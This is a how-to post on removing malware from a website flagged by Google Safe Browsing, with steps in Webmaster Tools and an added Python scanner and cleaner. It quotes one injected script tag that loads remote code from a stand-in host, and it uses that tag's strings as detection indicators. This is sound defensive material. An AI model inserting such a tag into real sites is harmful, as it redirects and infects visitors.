How to Fix Message: Reported Attack Page! From Google

If you ever come across this message while accessing your site, it means that Google has detected malicious code on your site. You’re probably using either Firefox or Chrome, which use data from Google’s Safe Browsing to identify phishing and malware pages. Because the browser (Firefox/Chrome) gets its data from Google, you see the page with the message “Reported Attack Page!” In any case, here are some steps you can take to remove the malicious code from your site and stop this page from displaying.

1- Since Google is the one that detected the malware on your site, your best bet is to see what they found. To do that, log in to your Google account and go to Webmaster Tools.

2- Once you’re logged in, click on your site name, and then click on “Security Issues.” Here you will find a detailed report of what Google found on your site, along with a list of the pages that were infected.

3- Click “Show Details” to see what Google flagged as malware or malicious code. Here’s an example of the code that was injected on the site. The code was redirecting users to a different site.

As you can see in the section “Suspicious Snippet,” there is JavaScript code pointing to another website.

<script src="demodomain.cz/rvy4lxwk.php?id=89574397" type="text/javascript">// <![CDATA[ // ]]></script>

So now we have something to search for in our pages. How you go about finding the code may vary depending on the platform. For this example, I’m assuming you’re using WordPress. However, you could use this method for any platform.

4- Removing Malware: Log in to your hosting provider or hosting account, and open any of the infected pages in an editor. Once you’ve opened the page, use the find/search feature to search for some part of the malicious code. For example, from the malicious code above you could enter “demodomain.cz” or “89574397” as a search pattern to identify where the malicious code is. Chances are that the attacker inserted the malicious code in the same segment of several pages. If you find that the malicious code has been inserted in the header of your page, there’s a pretty good chance that’s where you’ll find it in the rest of the infected pages. (Remove all malicious code.)

5- Request a Review: Once you have removed the code from the pages, you will have to submit a “Request a Review,” which is the red button on the “Security Issues” page. Click on the button and describe the steps you took to remove the malware.

If you were successful in removing all malware, your site should be up in less than 24 hours.
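The search in step 4 can be run over the whole site at once instead of page by page. The following Python script is an added example, not code from the original post: it uses the two search strings from the suspicious snippet above, while the list of file extensions and the function names are assumptions.

```python
import os
import re
import shutil

# Search strings taken from the "Suspicious Snippet" shown on this page.
INDICATORS = (b"demodomain.cz", b"89574397")
# Assumption: injected markup lives in these file types of a WordPress tree.
EXTENSIONS = (".php", ".html", ".htm", ".js")


def tag_pattern(indicator):
    """Match one whole <script src="...indicator..."></script> element."""
    return re.compile(
        rb"<script\b[^>]*\bsrc\s*=\s*[\"'][^\"'>]*" + re.escape(indicator)
        + rb"[^\"'>]*[\"'][^>]*>.*?</script\s*>",
        re.IGNORECASE | re.DOTALL,
    )


def scan(root, indicators=INDICATORS):
    """Return sorted (path, line_number) pairs for lines holding an indicator."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:  # bytes: templates may not be UTF-8
                for number, line in enumerate(fh, 1):
                    if any(i in line for i in indicators):
                        hits.append((path, number))
    return sorted(hits)


def clean_file(path, indicator=INDICATORS[0]):
    """Remove the injected tag from one file; return how many were removed."""
    with open(path, "rb") as fh:
        data = fh.read()
    cleaned, count = tag_pattern(indicator).subn(b"", data)
    if count:
        shutil.copy2(path, path + ".bak")  # keep the infected original for review
        with open(path, "wb") as fh:
            fh.write(cleaned)
    return count


if __name__ == "__main__":
    for path, number in scan("."):  # run from the site's document root
        print(f"{path}:{number}")
```

Review the reported lines first, then call `clean_file` on each affected file and run `scan` again to confirm nothing is left before requesting the review. Move the `.bak` copies out of the document root afterwards so they are not served to visitors.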
